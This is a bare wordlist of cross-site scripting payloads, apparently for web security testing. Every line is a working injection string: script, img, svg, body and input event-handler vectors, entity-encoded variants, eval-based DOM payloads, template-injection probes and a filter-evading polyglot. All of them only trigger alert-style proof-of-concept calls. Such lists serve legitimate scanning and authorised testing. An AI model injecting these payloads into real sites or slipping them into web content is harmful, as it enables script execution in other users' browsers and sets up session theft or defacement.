# XSS Payloads Database
# Extended payloads for XSS testing

# Basic script tags
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>prompt(1)</script>
<script>confirm(1)</script>

# Image tags
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img/src=x onerror=alert(1)>
<img src onerror=alert(1)>

# SVG
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg><script>alert(1)</script></svg>

# Body tag
<body onload=alert(1)>
<body onpageshow=alert(1)>

# Input tags
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>

# Other event handlers
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<select onfocus=alert(1) autofocus>

# Encoded
<script>alert&#40;1&#41;</script>
<script>alert&#x28;1&#x29;</script>
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

# DOM-based
<script>document.write('<img src=x onerror=alert(1)>')</script>
<script>eval('alert(1)')</script>

# Angular/Template
{{constructor.constructor('alert(1)')()}}
{{7*7}}
${7*7}

# Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
